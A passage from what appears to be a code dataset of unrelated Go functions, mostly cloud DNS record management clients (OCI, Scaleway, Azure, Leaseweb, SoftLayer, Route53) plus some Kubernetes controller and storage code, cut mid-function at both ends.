r.Domain)\n\t\t\t}\n\t\t}\n\t} else {\n\t\tfor _, r := range insert {\n\t\t\tfmt.Printf(\"+%s:%s:%d:%s\\n\", r.Domain, r.Type, r.Ttl, r.Data)\n\t\t}\n\t}\n\n\treturn added, removed, nil\n}", "func ApplyMachineResources(ctx context.Context, c client.Client) error {\n\tfns := make([]flow.TaskFn, 0, len(machineCRDs))\n\n\tfor _, crd := range machineCRDs {\n\t\tobj := &apiextensionsv1beta1.CustomResourceDefinition{\n\t\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\t\tName: crd.Name,\n\t\t\t},\n\t\t}\n\t\tspec := crd.Spec.DeepCopy()\n\n\t\tfns = append(fns, func(ctx context.Context) error {\n\t\t\t_, err := controllerutil.CreateOrUpdate(ctx, c, obj, func() error {\n\t\t\t\tobj.Labels = utils.MergeStringMaps(obj.Labels, deletionProtectionLabels)\n\t\t\t\tobj.Spec = *spec\n\t\t\t\treturn nil\n\t\t\t})\n\t\t\treturn err\n\t\t})\n\t}\n\n\treturn flow.Parallel(fns...)(ctx)\n}", "func getRoute53ZoneConfig(config *route53Zone, rrset *route53.ResourceRecordSet) {\n\n\tvar rr resourceRecordSet\n\n\t// Ignore SOA and NS record types\n\tif aws.StringValue(rrset.Type) == \"SOA\" || aws.StringValue(rrset.Type) == \"NS\" {\n\t\treturn\n\t}\n\n\trr.Name = aws.StringValue(rrset.Name)\n\tif rrset.TTL != nil {\n\t\trr.TTL = aws.Int64Value(rrset.TTL)\n\t}\n\n\trr.Type = aws.StringValue(rrset.Type)\n\n\t// Only add AliasTarget if it exists\n\tif rrset.AliasTarget != nil {\n\t\trr.AliasTarget.DNSName = aws.StringValue(rrset.AliasTarget.DNSName)\n\t\trr.AliasTarget.HostedZoneID = aws.StringValue(rrset.AliasTarget.HostedZoneId)\n\t\trr.AliasTarget.EvaluateTargetHealth = aws.BoolValue(rrset.AliasTarget.EvaluateTargetHealth)\n\t}\n\n\t// Only add RR if it exists\n\tif rrset.ResourceRecords != nil {\n\t\tfor _, rs := range rrset.ResourceRecords {\n\t\t\tvar recrecord resourceRecords\n\t\t\trecrecord.Value = aws.StringValue(rs.Value)\n\t\t\trr.ResourceRecords = append(rr.ResourceRecords, recrecord)\n\n\t\t}\n\t}\n\n\t// Finally append the RR to the configuration\n\tconfig.ResourceRecordSets = append(config.ResourceRecordSets, rr)\n}", "func (m *EducationAssignment) SetResources(value []EducationAssignmentResourceable)() {\n m.resources = value\n}", "func (client DnsClient) PatchZoneRecords(ctx context.Context, request PatchZoneRecordsRequest) (response PatchZoneRecordsResponse, err error) {\n\tvar ociResponse common.OCIResponse\n\tpolicy := common.NoRetryPolicy()\n\tif request.RetryPolicy() != nil {\n\t\tpolicy = *request.RetryPolicy()\n\t}\n\tociResponse, err = common.Retry(ctx, request, client.patchZoneRecords, policy)\n\tif err != nil {\n\t\tif ociResponse != nil {\n\t\t\tif httpResponse := ociResponse.HTTPResponse(); httpResponse != nil {\n\t\t\t\topcRequestId := httpResponse.Header.Get(\"opc-request-id\")\n\t\t\t\tresponse = PatchZoneRecordsResponse{RawResponse: httpResponse, OpcRequestId: &opcRequestId}\n\t\t\t} else {\n\t\t\t\tresponse = PatchZoneRecordsResponse{}\n\t\t\t}\n\t\t}\n\t\treturn\n\t}\n\tif convertedResponse, ok := ociResponse.(PatchZoneRecordsResponse); ok {\n\t\tresponse = convertedResponse\n\t} else {\n\t\terr = fmt.Errorf(\"failed to convert OCIResponse into PatchZoneRecordsResponse\")\n\t}\n\treturn\n}", "func PushRegionResources(req *restful.Request, resp *restful.Response) {\n\tresourcesReq := new(types.RegionResourcesReq)\n\terr := req.ReadEntity(&resourcesReq)\n\tif err != nil {\n\t\tklog.Errorf(\"Failed to unmarshall region resources from request body, err: %s\", err)\n\t\tutils.WriteFailedJSONResponse(resp, http.StatusBadRequest, utils.RequestBodyParamInvalid(err.Error()))\n\t\treturn\n\t}\n\tklog.Infof(\"RegionResourceReq: %s\", utils.GetJSONString(resourcesReq))\n\tresources := resourcesReq.RegionResources\n\tsched := scheduler.GetScheduler()\n\tif sched == nil {\n\t\tklog.Errorf(\"Scheduler is not initialized, please wait...\")\n\t\tutils.WriteFailedJSONResponse(resp, http.StatusInternalServerError, utils.InternalServerError())\n\t\treturn\n\t}\n\tfor _, resource := range resources {\n\t\terr = sched.UpdateSiteDynamicResource(resource.RegionName, &types.SiteResource{CPUMemResources: resource.CPUMemResources, VolumeResources: resource.VolumeResources})\n\t\tif err != nil {\n\t\t\tklog.Errorf(\"Schedule to update site dynamic resource for region %s with err %v\", resource.RegionName, err)\n\t\t\tutils.WriteFailedJSONResponse(resp, http.StatusInternalServerError, utils.InternalServerWithError(err.Error()))\n\t\t\treturn\n\t\t}\n\t}\n\tresourceResp := types.SiteResourceRes{Result: \"ok\"}\n\tresp.WriteHeaderAndEntity(http.StatusCreated, resourceResp)\n}", "func (client DnsClient) patchDomainRecords(ctx context.Context, request common.OCIRequest) (common.OCIResponse, error) {\n\thttpRequest, err := request.HTTPRequest(http.MethodPatch, \"/zones/{zoneNameOrId}/records/{domain}\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar response PatchDomainRecordsResponse\n\tvar httpResponse *http.Response\n\thttpResponse, err = client.Call(ctx, &httpRequest)\n\tdefer common.CloseBodyIfValid(httpResponse)\n\tresponse.RawResponse = httpResponse\n\tif err != nil {\n\t\treturn response, err\n\t}\n\n\terr = common.UnmarshalResponse(httpResponse, &response)\n\treturn response, err\n}", "func (p *Provider) DeleteRecords(ctx context.Context, zone string, records []libdns.Record) ([]libdns.Record, error) {\n\tp.mutex.Lock()\n\tdefer p.mutex.Unlock()\n\n\tclient := &http.Client{}\n\n\tvar deletedRecords []libdns.Record\n\n\tfor _, record := range records {\n\t\treq, err := http.NewRequest(http.MethodDelete, fmt.Sprintf(\"https://api.leaseweb.com/hosting/v2/domains/%s/resourceRecordSets/%s/%s\", zone, record.Name, record.Type), nil)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\treq.Header.Add(LeasewebApiKeyHeader, p.APIKey)\n\n\t\tres, err := client.Do(req)\n\t\tdefer res.Body.Close()\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif res.StatusCode < 200 || res.StatusCode > 299 {\n\t\t\treturn nil, fmt.Errorf(\"Received StatusCode %d from Leaseweb API\", res.StatusCode)\n\t\t}\n\n\t\tdeletedRecords = append(deletedRecords, record)\n\t}\n\n\treturn deletedRecords, nil\n}", "func (r Dns_Domain_ResourceRecord_MxType) CreateObjects(templateObjects []datatypes.Dns_Domain_ResourceRecord) (resp []datatypes.Dns_Domain_ResourceRecord, err error) {\n\tparams := []interface{}{\n\t\ttemplateObjects,\n\t}\n\terr = r.Session.DoRequest(\"SoftLayer_Dns_Domain_ResourceRecord_MxType\", \"createObjects\", params, &r.Options, &resp)\n\treturn\n}", "func TestSpareResourceSetUpdate(t *testing.T) { //nolint:dupl\n\tvar result SpareResourceSet\n\terr := json.NewDecoder(strings.NewReader(spareResourceSetBody)).Decode(&result)\n\n\tif err != nil {\n\t\tt.Errorf(\"Error decoding JSON: %s\", err)\n\t}\n\n\ttestClient := &common.TestClient{}\n\tresult.SetClient(testClient)\n\n\tresult.OnLine = true\n\tresult.ResourceType = \"Hat\"\n\tresult.TimeToProvision = \"P0DT06H30M5S\"\n\tresult.TimeToReplenish = \"P5DT0H12M0S\"\n\terr = result.Update()\n\n\tif err != nil {\n\t\tt.Errorf(\"Error making Update call: %s\", err)\n\t}\n\n\tcalls := testClient.CapturedCalls()\n\n\tif strings.Contains(calls[0].Payload, \"OnLine\") {\n\t\tt.Errorf(\"Unexpected OnLine update payload: %s\", calls[0].Payload)\n\t}\n\n\tif !strings.Contains(calls[0].Payload, \"ResourceType:Hat\") {\n\t\tt.Errorf(\"Unexpected ResourceType update payload: %s\", calls[0].Payload)\n\t}\n\n\tif !strings.Contains(calls[0].Payload, \"TimeToProvision:P0DT06H30M5S\") {\n\t\tt.Errorf(\"Unexpected TimeToProvision update payload: %s\", calls[0].Payload)\n\t}\n\n\tif !strings.Contains(calls[0].Payload, \"TimeToReplenish:P5DT0H12M0S\") {\n\t\tt.Errorf(\"Unexpected TimeToReplenish update payload: %s\", calls[0].Payload)\n\t}\n}", "func (s *API) UpdateDNSZoneRecords(req *UpdateDNSZoneRecordsRequest, opts ...scw.RequestOption) (*UpdateDNSZoneRecordsResponse, error) {\n\tvar err error\n\n\tif fmt.Sprint(req.DNSZone) == \"\" {\n\t\treturn nil, errors.New(\"field DNSZone cannot be empty in request\")\n\t}\n\n\tscwReq := &scw.ScalewayRequest{\n\t\tMethod: \"PATCH\",\n\t\tPath: \"/domain/v2beta1/dns-zones/\" + fmt.Sprint(req.DNSZone) + \"/records\",\n\t\tHeaders: http.Header{},\n\t}\n\n\terr = scwReq.SetBody(req)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar resp UpdateDNSZoneRecordsResponse\n\n\terr = s.client.Do(scwReq, &resp, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resp, nil\n}", "func (m *Mockclient) CreateOrUpdateRecordSet(arg0 context.Context, arg1, arg2 string, arg3 privatedns.RecordType, arg4 string, arg5 privatedns.RecordSet) error {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"CreateOrUpdateRecordSet\", arg0, arg1, arg2, arg3, arg4, arg5)\n\tret0, _ := ret[0].(error)\n\treturn ret0\n}", "func (r *ReconcileExtendedStatefulSet) createVolumeManagementStatefulSets(ctx context.Context, exStatefulSet *essv1a1.ExtendedStatefulSet, statefulSet *v1beta2.StatefulSet) error {\n\n\tvar desiredVolumeManagementStatefulSets []v1beta2.StatefulSet\n\n\ttemplate := exStatefulSet.Spec.Template\n\ttemplate.SetName(\"volume-management\")\n\n\t// Place the StatefulSet in the same namespace as the ExtendedStatefulSet\n\ttemplate.SetNamespace(exStatefulSet.Namespace)\n\n\tif exStatefulSet.Spec.ZoneNodeLabel == \"\" {\n\t\texStatefulSet.Spec.ZoneNodeLabel = essv1a1.DefaultZoneNodeLabel\n\t}\n\n\tif len(exStatefulSet.Spec.Zones) > 0 {\n\t\tfor zoneIndex, zoneName := range exStatefulSet.Spec.Zones {\n\t\t\tstatefulSet, err := r.generateVolumeManagementSingleStatefulSet(exStatefulSet, &template, zoneIndex, zoneName)\n\t\t\tif err != nil {\n\t\t\t\treturn errors.Wrapf(err, \"Could not generate volumeManagement StatefulSet template for AZ '%d/%s'\", zoneIndex, zoneName)\n\t\t\t}\n\t\t\tdesiredVolumeManagementStatefulSets = append(desiredVolumeManagementStatefulSets, *statefulSet)\n\t\t}\n\t} else {\n\t\tstatefulSet, err := r.generateVolumeManagementSingleStatefulSet(exStatefulSet, &template, -1, \"\")\n\t\tif err != nil {\n\t\t\treturn errors.Wrap(err, \"Could not generate StatefulSet template for single zone\")\n\t\t}\n\t\tdesiredVolumeManagementStatefulSets = append(desiredVolumeManagementStatefulSets, *statefulSet)\n\t}\n\n\tfor _, desiredVolumeManagementStatefulSet := range desiredVolumeManagementStatefulSets {\n\n\t\toriginalTemplate := exStatefulSet.Spec.Template.DeepCopy()\n\t\t// Set the owner of the StatefulSet, so it's garbage collected,\n\t\t// and we can find it later\n\t\tctxlog.Info(ctx, \"Setting owner for StatefulSet '\", desiredVolumeManagementStatefulSet.Name, \"' to ExtendedStatefulSet '\", exStatefulSet.Name, \"' in namespace '\", exStatefulSet.Namespace, \"'.\")\n\t\tif err := r.setReference(exStatefulSet, &desiredVolumeManagementStatefulSet, r.scheme); err != nil {\n\t\t\treturn errors.Wrapf(err, \"could not set owner for volumeManagement StatefulSet '%s' to ExtendedStatefulSet '%s' in namespace '%s'\", desiredVolumeManagementStatefulSet.Name, exStatefulSet.Name, exStatefulSet.Namespace)\n\t\t}\n\n\t\t// Create the StatefulSet\n\t\tif err := r.client.Create(ctx, &desiredVolumeManagementStatefulSet); err != nil {\n\t\t\treturn errors.Wrapf(err, \"could not create volumeManagement StatefulSet '%s' for ExtendedStatefulSet '%s' in namespace '%s'\", desiredVolumeManagementStatefulSet.Name, exStatefulSet.Name, exStatefulSet.Namespace)\n\t\t}\n\n\t\tctxlog.Info(ctx, \"Created VolumeManagement StatefulSet '\", desiredVolumeManagementStatefulSet.Name, \"' for ExtendedStatefulSet '\", exStatefulSet.Name, \"' in namespace '\", exStatefulSet.Namespace, \"'.\")\n\n\t\texStatefulSet.Spec.Template = *originalTemplate\n\t}\n\treturn nil\n}", "func (parser *MRCPParser) MRCPParserResourceSet(name string) {\n\n}", "func (r *RecordDB) BatchSet(ctx context.Context, recs []record.Material) error {\n\tif len(recs) == 0 {\n\t\treturn nil\n\t}\n\n\tr.batchLock.Lock()\n\tdefer r.batchLock.Unlock()\n\n\t// It's possible, that in the batch can be records from different pulses\n\t// because of that we need to track a current pulse and position\n\t// for different pulses position is requested from db\n\t// We can get position on every loop, but we SHOULDN'T do this\n\t// Because it isn't efficient\n\tlastKnowPulse := insolar.PulseNumber(0)\n\tposition := uint32(0)\n\n\terr := r.db.Backend().Update(func(txn *badger.Txn) error {\n\t\tfor _, rec := range recs {\n\t\t\tif rec.ID.IsEmpty() {\n\t\t\t\treturn errors.New(\"id is empty\")\n\t\t\t}\n\n\t\t\terr := setRecord(txn, recordKey(rec.ID), rec)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\t// For cross-pulse batches\n\t\t\tif lastKnowPulse != rec.ID.Pulse() {\n\t\t\t\t// Set last known before changing pulse/position\n\t\t\t\terr := setLastKnownPosition(txn, lastKnowPulse, position)\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\n\t\t\t\t// fetch position for a new pulse\n\t\t\t\tposition, err = getLastKnownPosition(txn, rec.ID.Pulse())\n\t\t\t\tif err != nil && err != ErrNotFound {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tlastKnowPulse = rec.ID.Pulse()\n\t\t\t}\n\n\t\t\tposition++\n\n\t\t\terr = setPosition(txn, rec.ID, position)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t}\n\n\t\t// set position for last record\n\t\terr := setLastKnownPosition(txn, lastKnowPulse, position)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\treturn nil\n\t})\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func (p *Provider) AppendRecords(ctx context.Context, zone string, records []libdns.Record) ([]libdns.Record, error) {\n\treturn p.updateRecords(ctx, zone, records)\n}", "func (client DnsClient) deleteRRSet(ctx context.Context, request common.OCIRequest) (common.OCIResponse, error) {\n\thttpRequest, err := request.HTTPRequest(http.MethodDelete, \"/zones/{zoneNameOrId}/records/{domain}/{rtype}\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar response DeleteRRSetResponse\n\tvar httpResponse *http.Response\n\thttpResponse, err = client.Call(ctx, &httpRequest)\n\tdefer common.CloseBodyIfValid(httpResponse)\n\tresponse.RawResponse = httpResponse\n\tif err != nil {\n\t\treturn response, err\n\t}\n\n\terr = common.UnmarshalResponse(httpResponse, &response)\n\treturn response, err\n}", "func (zonesSRV *PrivateDnsZones_SRV_Spec) AssignProperties_To_PrivateDnsZones_SRV_Spec(destination *v20200601s.PrivateDnsZones_SRV_Spec) error {\n\t// Create a new property bag\n\tpropertyBag := genruntime.NewPropertyBag()\n\n\t// ARecords\n\tif zonesSRV.ARecords != nil {\n\t\taRecordList := make([]v20200601s.ARecord, len(zonesSRV.ARecords))\n\t\tfor aRecordIndex, aRecordItem := range zonesSRV.ARecords {\n\t\t\t// Shadow the loop variable to avoid aliasing\n\t\t\taRecordItem := aRecordItem\n\t\t\tvar aRecord v20200601s.ARecord\n\t\t\terr := aRecordItem.AssignProperties_To_ARecord(&aRecord)\n\t\t\tif err != nil {\n\t\t\t\treturn errors.Wrap(err, \"calling AssignProperties_To_ARecord() to populate field ARecords\")\n\t\t\t}\n\t\t\taRecordList[aRecordIndex] = aRecord\n\t\t}\n\t\tdestination.ARecords = aRecordList\n\t} else {\n\t\tdestination.ARecords = nil\n\t}\n\n\t// AaaaRecords\n\tif zonesSRV.AaaaRecords != nil {\n\t\taaaaRecordList := make([]v20200601s.AaaaRecord, len(zonesSRV.AaaaRecords))\n\t\tfor aaaaRecordIndex, aaaaRecordItem := range zonesSRV.AaaaRecords {\n\t\t\t// Shadow the loop variable to avoid aliasing\n\t\t\taaaaRecordItem := aaaaRecordItem\n\t\t\tvar aaaaRecord v20200601s.AaaaRecord\n\t\t\terr := aaaaRecordItem.AssignProperties_To_AaaaRecord(&aaaaRecord)\n\t\t\tif err != nil {\n\t\t\t\treturn errors.Wrap(err, \"calling AssignProperties_To_AaaaRecord() to populate field AaaaRecords\")\n\t\t\t}\n\t\t\taaaaRecordList[aaaaRecordIndex] = aaaaRecord\n\t\t}\n\t\tdestination.AaaaRecords = aaaaRecordList\n\t} else {\n\t\tdestination.AaaaRecords = nil\n\t}\n\n\t// AzureName\n\tdestination.AzureName = zonesSRV.AzureName\n\n\t// CnameRecord\n\tif zonesSRV.CnameRecord != nil {\n\t\tvar cnameRecord v20200601s.CnameRecord\n\t\terr := zonesSRV.CnameRecord.AssignProperties_To_CnameRecord(&cnameRecord)\n\t\tif err != nil {\n\t\t\treturn errors.Wrap(err, \"calling AssignProperties_To_CnameRecord() to populate field CnameRecord\")\n\t\t}\n\t\tdestination.CnameRecord = &cnameRecord\n\t} else {\n\t\tdestination.CnameRecord = nil\n\t}\n\n\t// Etag\n\tdestination.Etag = genruntime.ClonePointerToString(zonesSRV.Etag)\n\n\t// Metadata\n\tdestination.Metadata = genruntime.CloneMapOfStringToString(zonesSRV.Metadata)\n\n\t// MxRecords\n\tif zonesSRV.MxRecords != nil {\n\t\tmxRecordList := make([]v20200601s.MxRecord, len(zonesSRV.MxRecords))\n\t\tfor mxRecordIndex, mxRecordItem := range zonesSRV.MxRecords {\n\t\t\t// Shadow the loop variable to avoid aliasing\n\t\t\tmxRecordItem := mxRecordItem\n\t\t\tvar mxRecord v20200601s.MxRecord\n\t\t\terr := mxRecordItem.AssignProperties_To_MxRecord(&mxRecord)\n\t\t\tif err != nil {\n\t\t\t\treturn errors.Wrap(err, \"calling AssignProperties_To_MxRecord() to populate field MxRecords\")\n\t\t\t}\n\t\t\tmxRecordList[mxRecordIndex] = mxRecord\n\t\t}\n\t\tdestination.MxRecords = mxRecordList\n\t} else {\n\t\tdestination.MxRecords = nil\n\t}\n\n\t// OriginalVersion\n\tdestination.OriginalVersion = zonesSRV.OriginalVersion()\n\n\t// Owner\n\tif zonesSRV.Owner != nil {\n\t\towner := zonesSRV.Owner.Copy()\n\t\tdestination.Owner = &owner\n\t} else {\n\t\tdestination.Owner = nil\n\t}\n\n\t// PtrRecords\n\tif zonesSRV.PtrRecords != nil {\n\t\tptrRecordList := make([]v20200601s.PtrRecord, len(zonesSRV.PtrRecords))\n\t\tfor ptrRecordIndex, ptrRecordItem := range zonesSRV.PtrRecords {\n\t\t\t// Shadow the loop variable to avoid aliasing\n\t\t\tptrRecordItem := ptrRecordItem\n\t\t\tvar ptrRecord v20200601s.PtrRecord\n\t\t\terr := ptrRecordItem.AssignProperties_To_PtrRecord(&ptrRecord)\n\t\t\tif err != nil {\n\t\t\t\treturn errors.Wrap(err, \"calling AssignProperties_To_PtrRecord() to populate field PtrRecords\")\n\t\t\t}\n\t\t\tptrRecordList[ptrRecordIndex] = ptrRecord\n\t\t}\n\t\tdestination.PtrRecords = ptrRecordList\n\t} else {\n\t\tdestination.PtrRecords = nil\n\t}\n\n\t// SoaRecord\n\tif zonesSRV.SoaRecord != nil {\n\t\tvar soaRecord v20200601s.SoaRecord\n\t\terr := zonesSRV.SoaRecord.AssignProperties_To_SoaRecord(&soaRecord)\n\t\tif err != nil {\n\t\t\treturn errors.Wrap(err, \"calling AssignProperties_To_SoaRecord() to populate field SoaRecord\")\n\t\t}\n\t\tdestination.SoaRecord = &soaRecord\n\t} else {\n\t\tdestination.SoaRecord = nil\n\t}\n\n\t// SrvRecords\n\tif zonesSRV.SrvRecords != nil {\n\t\tsrvRecordList := make([]v20200601s.SrvRecord, len(zonesSRV.SrvRecords))\n\t\tfor srvRecordIndex, srvRecordItem := range zonesSRV.SrvRecords {\n\t\t\t// Shadow the loop variable to avoid aliasing\n\t\t\tsrvRecordItem := srvRecordItem\n\t\t\tvar srvRecord v20200601s.SrvRecord\n\t\t\terr := srvRecordItem.AssignProperties_To_SrvRecord(&srvRecord)\n\t\t\tif err != nil {\n\t\t\t\treturn errors.Wrap(err, \"calling AssignProperties_To_SrvRecord() to populate field SrvRecords\")\n\t\t\t}\n\t\t\tsrvRecordList[srvRecordIndex] = srvRecord\n\t\t}\n\t\tdestination.SrvRecords = srvRecordList\n\t} else {\n\t\tdestination.SrvRecords = nil\n\t}\n\n\t// Ttl\n\tdestination.Ttl = genruntime.ClonePointerToInt(zonesSRV.Ttl)\n\n\t// TxtRecords\n\tif zonesSRV.TxtRecords != nil {\n\t\ttxtRecordList := make([]v20200601s.TxtRecord, len(zonesSRV.TxtRecords))\n\t\tfor txtRecordIndex, txtRecordItem := range zonesSRV.TxtRecords {\n\t\t\t// Shadow the loop variable to avoid aliasing\n\t\t\ttxtRecordItem := txtRecordItem\n\t\t\tvar txtRecord v20200601s.TxtRecord\n\t\t\terr := txtRecordItem.AssignProperties_To_TxtRecord(&txtRecord)\n\t\t\tif err != nil {\n\t\t\t\treturn errors.Wrap(err, \"calling AssignProperties_To_TxtRecord() to populate field TxtRecords\")\n\t\t\t}\n\t\t\ttxtRecordList[txtRecordIndex] = txtRecord\n\t\t}\n\t\tdestination.TxtRecords = txtRecordList\n\t} else {\n\t\tdestination.TxtRecords = nil\n\t}\n\n\t// Update the property bag\n\tif len(propertyBag) > 0 {\n\t\tdestination.PropertyBag = propertyBag\n\t} else {\n\t\tdestination.PropertyBag = nil\n\t}\n\n\t// No error\n\treturn nil\n}", "func (client *RecordSetsClient) listCreateRequest(ctx context.Context, resourceGroupName string, privateZoneName string, options *RecordSetsListOptions) (*azcore.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/privateDnsZones/{privateZoneName}/ALL\"\n\tif resourceGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter resourceGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{resourceGroupName}\", url.PathEscape(resourceGroupName))\n\tif privateZoneName == \"\" {\n\t\treturn nil, errors.New(\"parameter privateZoneName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{privateZoneName}\", url.PathEscape(privateZoneName))\n\tif client.subscriptionID == \"\" {\n\t\treturn nil, errors.New(\"parameter client.subscriptionID cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\treq, err := azcore.NewRequest(ctx, http.MethodGet, azcore.JoinPaths(client.con.Endpoint(), urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treq.Telemetry(telemetryInfo)\n\treqQP := req.URL.Query()\n\tif options != nil && options.Top != nil {\n\t\treqQP.Set(\"$top\", strconv.FormatInt(int64(*options.Top), 10))\n\t}\n\tif options != nil && options.Recordsetnamesuffix != nil {\n\t\treqQP.Set(\"$recordsetnamesuffix\", *options.Recordsetnamesuffix)\n\t}\n\treqQP.Set(\"api-version\", \"2020-06-01\")\n\treq.URL.RawQuery = reqQP.Encode()\n\treq.Header.Set(\"Accept\", \"application/json\")\n\treturn req, nil\n}", "func (zonesSRV *PrivateDnsZones_SRV_Spec) AssignProperties_From_PrivateDnsZones_SRV_Spec(source *v20200601s.PrivateDnsZones_SRV_Spec) error {\n\n\t// ARecords\n\tif source.ARecords != nil {\n\t\taRecordList := make([]ARecord, len(source.ARecords))\n\t\tfor aRecordIndex, aRecordItem := range source.ARecords {\n\t\t\t// Shadow the loop variable to avoid aliasing\n\t\t\taRecordItem := aRecordItem\n\t\t\tvar aRecord ARecord\n\t\t\terr := aRecord.AssignProperties_From_ARecord(&aRecordItem)\n\t\t\tif err != nil {\n\t\t\t\treturn errors.Wrap(err, \"calling AssignProperties_From_ARecord() to populate field ARecords\")\n\t\t\t}\n\t\t\taRecordList[aRecordIndex] = aRecord\n\t\t}\n\t\tzonesSRV.ARecords = aRecordList\n\t} else {\n\t\tzonesSRV.ARecords = nil\n\t}\n\n\t// AaaaRecords\n\tif source.AaaaRecords != nil {\n\t\taaaaRecordList := make([]AaaaRecord, len(source.AaaaRecords))\n\t\tfor aaaaRecordIndex, aaaaRecordItem := range source.AaaaRecords {\n\t\t\t// Shadow the loop variable to avoid aliasing\n\t\t\taaaaRecordItem := aaaaRecordItem\n\t\t\tvar aaaaRecord AaaaRecord\n\t\t\terr := aaaaRecord.AssignProperties_From_AaaaRecord(&aaaaRecordItem)\n\t\t\tif err != nil {\n\t\t\t\treturn errors.Wrap(err, \"calling AssignProperties_From_AaaaRecord() to populate field AaaaRecords\")\n\t\t\t}\n\t\t\taaaaRecordList[aaaaRecordIndex] = aaaaRecord\n\t\t}\n\t\tzonesSRV.AaaaRecords = aaaaRecordList\n\t} else {\n\t\tzonesSRV.AaaaRecords = nil\n\t}\n\n\t// AzureName\n\tzonesSRV.AzureName = source.AzureName\n\n\t// CnameRecord\n\tif source.CnameRecord != nil {\n\t\tvar cnameRecord CnameRecord\n\t\terr := cnameRecord.AssignProperties_From_CnameRecord(source.CnameRecord)\n\t\tif err != nil {\n\t\t\treturn errors.Wrap(err, \"calling AssignProperties_From_CnameRecord() to populate field CnameRecord\")\n\t\t}\n\t\tzonesSRV.CnameRecord = &cnameRecord\n\t} else {\n\t\tzonesSRV.CnameRecord = nil\n\t}\n\n\t// Etag\n\tzonesSRV.Etag = genruntime.ClonePointerToString(source.Etag)\n\n\t// Metadata\n\tzonesSRV.Metadata = genruntime.CloneMapOfStringToString(source.Metadata)\n\n\t// MxRecords\n\tif source.MxRecords != nil {\n\t\tmxRecordList := make([]MxRecord, len(source.MxRecords))\n\t\tfor mxRecordIndex, mxRecordItem := range source.MxRecords {\n\t\t\t// Shadow the loop variable to avoid aliasing\n\t\t\tmxRecordItem := mxRecordItem\n\t\t\tvar mxRecord MxRecord\n\t\t\terr := mxRecord.AssignProperties_From_MxRecord(&mxRecordItem)\n\t\t\tif err != nil {\n\t\t\t\treturn errors.Wrap(err, \"calling AssignProperties_From_MxRecord() to populate field MxRecords\")\n\t\t\t}\n\t\t\tmxRecordList[mxRecordIndex] = mxRecord\n\t\t}\n\t\tzonesSRV.MxRecords = mxRecordList\n\t} else {\n\t\tzonesSRV.MxRecords = nil\n\t}\n\n\t// Owner\n\tif source.Owner != nil {\n\t\towner := source.Owner.Copy()\n\t\tzonesSRV.Owner = &owner\n\t} else {\n\t\tzonesSRV.Owner = nil\n\t}\n\n\t// PtrRecords\n\tif source.PtrRecords != nil {\n\t\tptrRecordList := make([]PtrRecord, len(source.PtrRecords))\n\t\tfor ptrRecordIndex, ptrRecordItem := range source.PtrRecords {\n\t\t\t// Shadow the loop variable to avoid aliasing\n\t\t\tptrRecordItem := ptrRecordItem\n\t\t\tvar ptrRecord PtrRecord\n\t\t\terr := ptrRecord.AssignProperties_From_PtrRecord(&ptrRecordItem)\n\t\t\tif err != nil {\n\t\t\t\treturn errors.Wrap(err, \"calling AssignProperties_From_PtrRecord() to populate field PtrRecords\")\n\t\t\t}\n\t\t\tptrRecordList[ptrRecordIndex] = ptrRecord\n\t\t}\n\t\tzonesSRV.PtrRecords = ptrRecordList\n\t} else {\n\t\tzonesSRV.PtrRecords = nil\n\t}\n\n\t// SoaRecord\n\tif source.SoaRecord != nil {\n\t\tvar soaRecord SoaRecord\n\t\terr := soaRecord.AssignProperties_From_SoaRecord(source.SoaRecord)\n\t\tif err != nil {\n\t\t\treturn errors.Wrap(err, \"calling AssignProperties_From_SoaRecord() to populate field SoaRecord\")\n\t\t}\n\t\tzonesSRV.SoaRecord = &soaRecord\n\t} else {\n\t\tzonesSRV.SoaRecord = nil\n\t}\n\n\t// SrvRecords\n\tif source.SrvRecords != nil {\n\t\tsrvRecordList := make([]SrvRecord, len(source.SrvRecords))\n\t\tfor srvRecordIndex, srvRecordItem := range source.SrvRecords {\n\t\t\t// Shadow the loop variable to avoid aliasing\n\t\t\tsrvRecordItem := srvRecordItem\n\t\t\tvar srvRecord SrvRecord\n\t\t\terr := srvRecord.AssignProperties_From_SrvRecord(&srvRecordItem)\n\t\t\tif err != nil {\n\t\t\t\treturn errors.Wrap(err, \"calling AssignProperties_From_SrvRecord() to populate field SrvRecords\")\n\t\t\t}\n\t\t\tsrvRecordList[srvRecordIndex] = srvRecord\n\t\t}\n\t\tzonesSRV.SrvRecords = srvRecordList\n\t} else {\n\t\tzonesSRV.SrvRecords = nil\n\t}\n\n\t// Ttl\n\tzonesSRV.Ttl = genruntime.ClonePointerToInt(source.Ttl)\n\n\t// TxtRecords\n\tif source.TxtRecords != nil {\n\t\ttxtRecordList := make([]TxtRecord, len(source.TxtRecords))\n\t\tfor txtRecordIndex, txtRecordItem := range source.TxtRecords {\n\t\t\t// Shadow the loop variable to avoid aliasing\n\t\t\ttxtRecordItem := txtRecordItem\n\t\t\tvar txtRecord TxtRecord\n\t\t\terr := txtRecord.AssignProperties_From_TxtRecord(&txtRecordItem)\n\t\t\tif err != nil {\n\t\t\t\treturn errors.Wrap(err, \"calling AssignProperties_From_TxtRecord() to populate field 